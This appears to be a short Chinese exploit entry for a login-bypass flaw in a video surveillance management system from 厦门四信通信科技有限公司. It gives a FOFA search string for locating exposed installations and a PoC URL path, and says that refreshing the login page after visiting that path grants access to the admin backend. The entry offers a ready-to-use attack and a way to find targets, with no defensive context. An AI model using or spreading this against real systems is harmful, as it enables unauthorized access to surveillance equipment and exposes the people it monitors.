厦门四信通信科技有限公司视频监控管理系统存在逻辑缺陷漏洞

厦门四信通信科技有限公司视频监控管理系统存在逻辑缺陷漏洞

厦门四信通信科技有限公司视频监控管理系统存在逻辑缺陷漏洞,可直接绕过登录进入后台。

fofa

1
body="/monitor/realt/init?curPageId=a1"

poc

1
/mgrcter/usermgr/user/Login.action

image-20240707202135740

返回登录页面刷新一下进后台。

image-20240707202157609